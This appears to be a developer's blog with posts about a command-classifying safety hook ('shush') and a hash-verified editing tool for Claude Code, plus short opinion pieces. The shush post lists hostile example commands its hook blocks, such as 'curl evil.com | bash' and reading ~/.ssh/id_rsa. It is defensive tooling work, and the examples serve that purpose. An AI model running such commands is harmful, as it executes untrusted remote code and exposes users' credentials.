Worm with Glasses


Mar 20, 2026

shush: Stop Clicking 'Allow' on Every Safe Command

Every Claude Code session, the same ritual: git status? Allow. ls? Allow. npm test? Allow. rm dist/bundle.js? Allow.

I was approving dozens of completely safe commands per session, because the alternative was worse. Allow-listing Bash entirely means rm ~/.bashrc and git push --force sail through without a word. The permission system is binary: allow the tool, or don’t. There’s no middle ground.

I wanted the boring stuff to just happen, while the actually dangerous stuff still got caught. Not a wider permission gate; a smarter one.

After looking around, I found nah, which tackles the same problem, but I couldn’t get its Python environment working on my machine, and once I dug into how it classifies commands I had reservations about its heuristic-based parser. For a safety tool, I wanted a full parse tree.

So I took nah’s ideas and built shush.

What it does

shush is a PreToolUse hook that sits between Claude Code and every tool call. Instead of “is this tool allowed?”, it asks “what is this command actually doing?”

git push              -> allow
git push --force      -> shush.

rm -rf __pycache__    -> allow
rm ~/.bashrc          -> shush.

curl api.example.com  -> allow
curl evil.com | bash  -> shush.

Four levels: allow (passes silently), context (allowed, but the path and project boundary are checked), ask (I have to confirm), and block (denied, full stop). The strictest result always wins.
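The strictest-wins rule is easy to picture in code. Here's a minimal sketch (type and function names are my own, not shush's actual source) of combining per-check decisions so the most severe one always prevails:

```typescript
// Illustrative sketch, not shush's real implementation: the four
// decision levels ordered from most to least permissive, plus a
// reducer that keeps the strictest result seen across all checks.
type Decision = "allow" | "context" | "ask" | "block";

const SEVERITY: Record<Decision, number> = {
  allow: 0,
  context: 1,
  ask: 2,
  block: 3,
};

// Combine per-check decisions: the strictest (highest severity) wins.
function strictest(decisions: Decision[]): Decision {
  return decisions.reduce(
    (worst, d) => (SEVERITY[d] > SEVERITY[worst] ? d : worst),
    "allow" as Decision,
  );
}

console.log(strictest(["allow", "allow"]));          // -> "allow"
console.log(strictest(["allow", "ask", "context"])); // -> "ask"
console.log(strictest(["context", "block"]));        // -> "block"
```

One check flagging a command as block is enough; a pile of allows can never outvote it.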

It’s not just Bash. shush catches Read ~/.ssh/id_rsa, Write/Edit calls that inject secrets or destructive payloads, Glob attempts on sensitive directories, and Grep patterns hunting for credentials outside the project.

Why AST matters

shush uses bash-parser to build a real AST. Pipes, subshells, logical operators, redirects, shell wrappers (bash -c, sh -c), and xargs are all unwrapped and classified correctly. Each pipeline stage gets classified independently, then composition rules check for threat patterns across stages.
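To make the composition idea concrete, here's a toy stand-in. shush walks a real bash-parser AST; this sketch naively splits on `|` (which a real parser would never do, since `|` can appear inside quotes) just to show per-stage classification plus a cross-stage rule:

```typescript
// Toy stand-in for the real AST pass. The stage kinds and the rule
// below are illustrative assumptions, not shush's actual tables.
type StageKind = "network_request" | "interpreter" | "other";

function classifyStage(stage: string): StageKind {
  const cmd = stage.trim().split(/\s+/)[0];
  if (cmd === "curl" || cmd === "wget") return "network_request";
  if (cmd === "bash" || cmd === "sh") return "interpreter";
  return "other";
}

// Composition rule: a download piped straight into a shell is the
// classic "curl | bash" pattern, blocked even though each stage on
// its own might be individually allowed.
function pipelineVerdict(command: string): "allow" | "block" {
  const kinds = command.split("|").map(classifyStage);
  for (let i = 0; i + 1 < kinds.length; i++) {
    if (kinds[i] === "network_request" && kinds[i + 1] === "interpreter") {
      return "block";
    }
  }
  return "allow";
}
```

The point is that the danger lives in the composition, not in either command alone, which is why each stage has to be classified independently first.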

Commands land in one of 21 action types (filesystem_read, git_safe, network_request, docker_manage, etc.), each with a default policy. A prefix trie (1,173 entries) gives fast lookup with no runtime I/O. Flag-level classifiers handle the nuance: git push is safe, git push --force is not.
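A prefix trie over command tokens looks roughly like this (a sketch with invented entries, not shush's real 1,173-entry table). Lookup walks token by token and keeps the deepest match, so `git push` beats a generic `git` entry, and a flag check can then tighten the result:

```typescript
// Illustrative trie sketch; action names and entries are assumptions.
type Action = "git_safe" | "git_write" | "filesystem_read" | "unknown";

interface TrieNode {
  action?: Action;
  children: Map<string, TrieNode>;
}

const root: TrieNode = { children: new Map() };

function insert(tokens: string[], action: Action): void {
  let node = root;
  for (const t of tokens) {
    if (!node.children.has(t)) node.children.set(t, { children: new Map() });
    node = node.children.get(t)!;
  }
  node.action = action;
}

// Deepest (most specific) match wins; unmatched trailing tokens
// such as flags and file arguments are simply ignored here.
function lookup(tokens: string[]): Action {
  let node = root;
  let best: Action = "unknown";
  for (const t of tokens) {
    const next = node.children.get(t);
    if (!next) break;
    node = next;
    if (node.action) best = node.action;
  }
  return best;
}

insert(["ls"], "filesystem_read");
insert(["git", "status"], "git_safe");
insert(["git", "push"], "git_write");

// Flag-level classifier layered on top: git push is fine
// until --force shows up.
function classify(cmd: string[]): { action: Action; forced: boolean } {
  return { action: lookup(cmd), forced: cmd.includes("--force") };
}
```

Because the table is baked in at build time, every lookup is a handful of Map hits with no runtime I/O.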

No LLMs in the loop. Every decision is deterministic and traceable.

The result

I allow-list Bash, Read, Glob, and Grep in Claude Code’s permissions and let shush guard them. The flow of a session is so much better. Safe commands execute silently. Dangerous ones get caught. I only get interrupted for the genuinely ambiguous cases.

It’s configurable (global ~/.config/shush/config.yaml, per-project .shush.yaml), but the defaults are tuned so most people won’t need to touch anything.

Install

/plugin marketplace add rjkaes/shush
/plugin install shush

Two commands. No configuration. The code is on GitHub: rjkaes/shush. Apache-2.0, TypeScript, built with Bun.

Mar 6, 2026

trueline-mcp v2: Now For Everyone, Not Just Claude Code

Two days ago I announced trueline-mcp: hash-verified, token-efficient file editing for Claude Code.

I’ve been using it to build new features and performance improvements. It works great!

But it only worked with Claude Code, and the MCP protocol doesn’t care which agent is on the other end of the pipe.

So I made it work everywhere.

Five platforms, one tool

trueline-mcp v2.0 supports Gemini CLI, VS Code Copilot, OpenCode, and Codex CLI alongside Claude Code. Same hash-verified edits, same token savings, regardless of which agent you’re running.

The hook system got a complete refactoring to make this possible. Platform-specific logic (tool names, response shapes, event naming) is isolated into thin wrappers around a shared core. A universal CLI dispatcher normalizes everything:

trueline-hook <platform> <event>

Gemini calls its pre-tool event beforetool. Claude Code calls it pretooluse. The dispatcher routes both to the same verification logic.
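The normalization boils down to a lookup table. Here's a sketch (the two platform event names come from above; the canonical names and table shape are my assumptions):

```typescript
// Each platform's event string maps to one canonical event, so the
// verification logic is written once and shared by every wrapper.
type CanonicalEvent = "pre-tool" | "post-tool" | "session-start";

const EVENT_MAP: Record<string, Record<string, CanonicalEvent>> = {
  gemini: { beforetool: "pre-tool" },
  "claude-code": { pretooluse: "pre-tool", sessionstart: "session-start" },
};

function dispatch(platform: string, event: string): CanonicalEvent {
  const canonical = EVENT_MAP[platform]?.[event.toLowerCase()];
  if (!canonical) throw new Error(`unknown event ${platform}/${event}`);
  return canonical;
}
```

Adding a sixth platform means adding one row to the table, not another copy of the verification code.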

Each platform gets its own instruction file tuned to that agent’s built-in tool names. The read_file → trueline_read redirect that makes sense for Gemini CLI would be nonsensical for Claude Code’s Read tool. These details matter when you’re intercepting tool calls.

You can also install it from npm now:

npm install -g trueline-mcp

trueline_outline: skip reading entirely!

v1.1 added a fourth tool: trueline_outline. It uses tree-sitter (via WASM) to extract the structural skeleton of a file (functions, classes, types, interfaces) without reading the source. Think of it as a table of contents.

For navigation and understanding, that’s usually enough. The agent doesn’t need to read 400 lines of a file to find the function it wants to edit. It outlines the file, identifies the 15-line range, reads just those lines, and edits. That’s a ~95% token reduction on the read side for the common case.

Supported languages: TypeScript, JavaScript, Python, Rust, Go, Java, C, C++, C#, Ruby, Swift, and more.

Smarter hook, less friction

The PreToolUse hook that blocks the built-in Edit tool used to be a blunt instrument. It blocked every edit attempt and redirected to trueline. Problem is, trueline can’t access every file. If a file is outside the allowed directories or matches a deny pattern, the block just caused a confusing failure.

Now the hook checks whether trueline actually has access to the target file before blocking. If it doesn’t, the built-in tool is allowed through. Same security boundary, fewer dead ends.
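The gate is a simple pre-check. A minimal sketch, assuming hypothetical config fields (`allowedDirs`, `denyPatterns`) rather than trueline's real ones:

```typescript
import * as path from "node:path";

// Can trueline actually handle this file? It must sit inside an
// allowed directory and not match any deny pattern.
function truelineCanAccess(
  file: string,
  allowedDirs: string[],
  denyPatterns: RegExp[],
): boolean {
  const abs = path.resolve(file);
  const inAllowed = allowedDirs.some(
    (d) => abs === d || abs.startsWith(d + path.sep),
  );
  const denied = denyPatterns.some((p) => p.test(path.basename(abs)));
  return inAllowed && !denied;
}

// Block the built-in Edit only when trueline could take over;
// otherwise let it through instead of creating a dead end.
function hookDecision(
  file: string,
  allowedDirs: string[],
  deny: RegExp[],
): "block" | "allow" {
  return truelineCanAccess(file, allowedDirs, deny) ? "block" : "allow";
}
```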

Performance

Two targeted optimizations in the hot paths:

Read path — Pre-computed a static lookup table for hash encoding (replacing per-line String.fromCharCode calls) and switched to buffer-based output assembly. Lines stay as raw Buffer bytes through the loop with a single decode at the end.

Edit path — Pass-through lines (the vast majority in any edit) were being hashed twice: once for checksum verification, once for the output file. Now they reuse the first hash.
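The read-path table trick is the old "precompute everything you can" move. A sketch of the idea (the actual alphabet and tag width in trueline are assumptions here):

```typescript
// One-time build: every two-letter tag, so the hot loop does a single
// array index instead of per-line String.fromCharCode calls.
const ALPHABET = "abcdefghijklmnopqrstuvwxyz"; // assumed encoding alphabet

const TAGS: string[] = [];
for (let i = 0; i < ALPHABET.length; i++) {
  for (let j = 0; j < ALPHABET.length; j++) {
    TAGS.push(ALPHABET[i] + ALPHABET[j]); // index 0 -> "aa", 1 -> "ab", ...
  }
}

// Hot path: a hash value becomes a tag with one array lookup,
// no string construction per line.
function tagFor(hash: number): string {
  return TAGS[hash % TAGS.length];
}
```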

The diff engine also got replaced. The old diff npm dependency compared two full file snapshots in memory. The new DiffCollector builds unified diffs incrementally during the streaming edit pass. One fewer dependency, no full-file buffering.

Install

If you’re on Claude Code and already have trueline installed, update to the latest:

/plugin install trueline-mcp@trueline-mcp

If you’re new, or on a different platform, setup instructions for all five platforms are in INSTALL.md.

The core is solid. The edit verification, streaming architecture, and token savings work the same across all platforms now. If you’re burning tokens on string-matched edits, give it a shot.

Mar 4, 2026

Claude Code's Edit Tool Wastes Your Most Expensive Tokens. Here's a Fix.

You’re deep into a Claude Code session. The agent is humming along, editing files, and making progress.

And quietly bleeding money on every single edit.

Here’s why. The built-in Edit tool uses string matching. To change five lines of code, the model has to echo back those exact five lines as old_string, then provide the replacement as new_string. That echoed text is pure overhead: it’s already in the file. The model is spending output tokens, the most expensive token class, just to point at code and say “I mean this part.”

For a typical 15-line edit, that’s ~200 wasted output tokens. Do a few dozen edits in a session (not unusual for any real feature work) and you’re burning serious money on text the model already knows is there.

It gets worse when something goes wrong. If the file changed since the agent last read it (maybe you saved in your editor, maybe another tool touched it), the string match fails. The model hallucinating a character or two has the same effect. Either way, the edit errors out, the agent re-reads the whole file to get back in sync, and you’ve just paid for all that content again. In longer sessions, these re-reads compound.

I got tired of watching this happen, so I built trueline-mcp to fix both problems.

The token tax on every edit

Let’s look at what’s actually happening. Here’s the built-in Edit under the hood. The model has to echo the old text just to locate the change:

{
  "file_path": "src/server.ts",
  "old_string": "export function handleRequest(req: Request) {\n  const body = await req.json();\n  validate(body);\n  return process(body);\n}",
  "new_string": "export function handleRequest(req: Request) {\n  const body = await req.json();\n  const parsed = schema.parse(body);\n  return process(parsed);\n}"
}

See all that duplicated text? trueline replaces it with a compact line-range reference:

{
  "file_path": "src/server.ts",
  "edits": [{
    "checksum": "1-50:a3b1c2d4",
    "range": "12:kf..16:qz",
    "content": "export function handleRequest(req: Request) {\n  const body = await req.json();\n  const parsed = schema.parse(body);\n  return process(parsed);\n}"
  }]
}

The model never echoes the old text. It says which lines to replace, proves it read them correctly, and provides the new content. ~200 fewer output tokens per edit, on the most expensive token class.

Oh, and there’s a fun gotcha with the built-in tool: if old_string appears more than once in the file, the edit fails. The model has to pad in extra context lines until the match is unique. Yet more wasted tokens. trueline addresses lines directly. No ambiguity, no padding.

Every edit is verified against reality

The same mechanism that saves tokens is what makes edits reliable. When the agent reads a file through trueline, every line comes back tagged with a short hash:

1:bx|import { Server } from "@modelcontextprotocol/sdk/server/index.js";
2:dd|
3:ew|const server = new Server({ name: "trueline-mcp", version: "0.1.0" });

checksum: 1-3:8a64a3f7

When the agent wants to edit, it echoes those hashes back. If the file changed since the read, the hashes won’t match and the edit is rejected before it touches disk. No silent corruption, no guessing, no “why does this file look wrong?” twenty minutes later.

This is the part that kills the re-read cycle. Instead of the agent discovering a stale match, failing, re-reading the whole file, and trying again, trueline catches the mismatch immediately and tells the agent exactly what’s wrong. One targeted re-read of the changed range, and it’s back on track.
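The tag-then-verify loop can be sketched in a few lines. Illustrative only: the post doesn't show trueline's real hash scheme, so this uses FNV-1a folded into a two-letter tag just to demonstrate the flow:

```typescript
// Toy short hash: FNV-1a 32-bit, folded into two lowercase letters.
// The real algorithm and tag width are unknown; this is a stand-in.
function shortHash(line: string): string {
  let h = 0x811c9dc5; // FNV-1a offset basis
  for (let i = 0; i < line.length; i++) {
    h ^= line.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0; // FNV prime, kept as uint32
  }
  const a = "abcdefghijklmnopqrstuvwxyz";
  return a[h % 26] + a[Math.floor(h / 26) % 26];
}

// Read side: tag every line, "lineNo:hash|content".
function tagLines(lines: string[]): string[] {
  return lines.map((l, i) => `${i + 1}:${shortHash(l)}|${l}`);
}

// Edit side: reject if any echoed hash no longer matches the file.
function verify(
  lines: string[],
  claims: { line: number; hash: string }[],
): boolean {
  return claims.every((c) => shortHash(lines[c.line - 1] ?? "") === c.hash);
}
```

A stale or hallucinated hash fails `verify` immediately, before anything is written, which is exactly the point where the built-in tool would instead burn a full re-read.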

Multiple edits to the same file go through in a single call too, each independently verified. The built-in Edit handles one replacement per call, so trueline cuts tool-call overhead for multi-site changes.

Three tools, zero config

  • trueline_read — reads a file, tags each line with a hash, returns a range checksum.
  • trueline_edit — verifies hashes, then applies the edit atomically. Supports multiple edits per call.
  • trueline_diff — same verification, but outputs a unified diff without touching disk. Good for previewing changes before committing to them.

Once installed, a SessionStart hook nudges the agent toward the trueline tools, and a PreToolUse hook blocks the built-in Edit tool so it can’t fall back to string matching. You don’t have to think about it—the agent uses verified edits from the start, automatically.

Security-wise, trueline enforces the same deny patterns Claude Code uses (.env, *.key, etc.).

Try it

/plugin marketplace add rjkaes/trueline-mcp
/plugin install trueline-mcp@trueline-mcp

Two commands. Your next Claude Code session will use hash-verified edits automatically. No configuration, no changes to your workflow. Fewer wasted tokens and edits that don’t silently corrupt your code.

Prior art

Can Boluk described the underlying problem (AI agents working against stale state) and Seth Livingston built a hash-line edit tool for VS Code. trueline brings the same idea to Claude Code as an MCP plugin.

The code is on GitHub: rjkaes/trueline-mcp. Apache-2.0, TypeScript, built with Bun.

Oct 29, 2025

The Biggest Lie in AI

Carl from The Internet of Bugs made a great video about The Biggest Lie in A.I.

A.I. companies repeat the claim that “this is the worst A.I. will ever be” and that’s simply not true. As Carl notes in the video, with the release of GPT-5, it’s clear that it’s not an across-the-board improvement over GPT-4.5.

Hardware tends to improve over time: gets faster, does more in parallel.

But LLMs are software, and software doesn’t have that track record.

As the old saying goes: “Grove giveth and Gates taketh away.”

May 3, 2022

Seventeen Years and a Million Lines of Code

I was looking at my old development projects recently when I noticed that all of them predate 2005. In 2005, I started work at ePublishing as a Perl developer. In the past 17 years I’ve been:

  • a Ruby and Rails developer
  • VP of Software Engineering
  • Chief Software Architect

In all that time, I’ve written hundreds of thousands of lines of code (maybe more than a million), but it’s locked away.

It’s a bit depressing that almost two decades of creativity is forever hidden from view. It’s the curse of corporate development: we can write blogs, give talks, and prepare papers, but we can’t show the code itself. All anyone sees are shadows on the wall.

More companies should release their source code. Most of what we write is not the company’s crown jewels. Let people see how you solved that weird third-party integration! Or how you monitor some obscure open-source service.

Every company is standing on a mountain of open-source code. Give back and let your developers have the opportunity to show off!
